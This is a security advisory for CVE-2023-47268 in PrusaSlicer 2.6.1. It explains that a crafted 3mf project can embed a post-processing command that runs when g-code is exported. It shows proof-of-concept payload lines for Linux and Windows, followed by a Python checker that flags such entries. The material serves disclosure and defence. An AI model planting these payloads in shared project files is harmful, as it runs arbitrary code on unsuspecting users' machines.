PrusaSlicer 2.6.1 - Arbitrary Code Execution on G-Code Export - exploit.company
Vendor: PrusaSlicer
By: Kamil Breński
CVSS: 6.1 HIGH
Arbitrary Code Execution
CWE: 94
Product Name: PrusaSlicer
Affected Version From: PrusaSlicer up to and including version 2.6.1
Affected Version To: PrusaSlicer up to and including version 2.6.1
Patch Exists: NO
Related CWE: CVE-2023-47268
CPE: a:prusa3d:prusaslicer:2.6.1
Platforms Tested: Windows, Linux
2024

PrusaSlicer 2.6.1 – Arbitrary Code Execution on G-Code Export

PrusaSlicer up to and including version 2.6.1 is vulnerable to arbitrary code execution when exporting g-code from a malicious 3mf project. By manipulating the 'Metadata/Slic3r_PE.config' file within the project, an attacker can insert a post-processing script that executes arbitrary code upon g-code export. This exploit has been demonstrated on both Windows and Linux platforms.

Mitigation:

Validate and sanitize input data to prevent unauthorized code execution. Regularly update PrusaSlicer to the latest version to mitigate this vulnerability.

Exploit-DB raw data:

# Exploit Title: PrusaSlicer 2.6.1 - Arbitrary code execution on g-code export
# Date: 16/01/2024
# Exploit Author: Kamil Breński
# Vendor Homepage: https://www.prusa3d.com
# Software Link: https://github.com/prusa3d/PrusaSlicer
# Version: PrusaSlicer up to and including version 2.6.1
# Tested on: Windows and Linux
# CVE: CVE-2023-47268

==========================================================================================
1.) 3mf Metadata extension
==========================================================================================

PrusaSlicer 3mf project (zip) archives contain the 'Metadata/Slic3r_PE.config' file, which describes various project settings; this is an extension to the regular 3mf file. PrusaSlicer parses this additional file to read those settings. One of the settings (post_process) is the post-processing script (https://help.prusa3d.com/article/post-processing-scripts_283913). This feature has great potential for abuse, as it allows a malicious user to create an evil 3mf project that will execute arbitrary code when the targeted user exports g-code from the malicious project. A project file needs to be modified with a post-process script setting in order to execute arbitrary code; this is demonstrated on both a Windows and a Linux host in the following way.

==========================================================================================
2.) PoC
==========================================================================================

For the Linux PoC, this CLI command is enough to execute the payload contained in the project: `./prusa-slicer -s code-exec-linux.3mf`. After slicing, a new file '/tmp/hax' will be created. This particular PoC contains this 'post_process' entry in the 'Slic3r_PE.config' file:

```
; post_process = "/usr/bin/id > /tmp/hax #\necho 'Here I am, executing arbitrary code on this host. Thanks for slicing (x_x)'>> /tmp/hax #"
```

Just slicing the 3mf using the `-s` flag is enough to start executing potentially malicious code.

For the Windows PoC with GUI, the malicious 3mf file needs to be opened as a project file (or the settings imported). After exporting, a pop-up executed by the payload will appear. The Windows PoC contains this entry:

```
; post_process = "C:\\Windows\\System32\\cmd.exe /c msg %username% Here I am, executing arbitrary code on this host. Thanks for slicing (x_x) "
```
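
A pre-open check for the setting described above, as an added example that is not part of the original advisory or of PrusaSlicer: it lists every non-empty `post_process` value found in a project's 'Metadata/Slic3r_PE.config' so the file can be reviewed before slicing or exporting. The function names and sample configs are constructed here, and the `; key = value` line format is assumed from the two entries shown above.

```python
import io
import re
import zipfile

CONFIG_NAME = "Metadata/Slic3r_PE.config"
# Matches config lines of the form shown above: ; post_process = "..."
POST_PROCESS_RE = re.compile(r"^\s*;?\s*post_process\s*=\s*(.*)$")

def find_post_process(threemf):
    """Return the non-empty post_process values found in a 3mf archive.

    `threemf` is a path or a binary file object. An empty list means the
    project config sets no post-processing script.
    """
    hits = []
    with zipfile.ZipFile(threemf) as archive:
        for name in archive.namelist():
            # Case-insensitive match on the member name (defensive assumption).
            if name.lower() != CONFIG_NAME.lower():
                continue
            text = archive.read(name).decode("utf-8", errors="replace")
            for line in text.splitlines():
                match = POST_PROCESS_RE.match(line)
                if not match:
                    continue
                value = match.group(1).strip()
                if value.strip('"'):  # ignore empty or "" values
                    hits.append(value)
    return hits

def build_sample(config_text):
    """Build an in-memory zip holding only the config member (constructed input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr(CONFIG_NAME, config_text)
    buf.seek(0)
    return buf

# Constructed samples: one project config with a script set, one without.
FLAGGED = build_sample('; layer_height = 0.2\n; post_process = "/usr/bin/id > /tmp/hax #"\n')
CLEAN = build_sample('; layer_height = 0.2\n; post_process = \n')

if __name__ == "__main__":
    for label, sample in (("flagged", FLAGGED), ("clean", CLEAN)):
        print(label, find_post_process(sample))
```

Any returned value is a command line that would run on g-code export, so a project from an untrusted source that returns a non-empty list should be inspected by hand before it is opened.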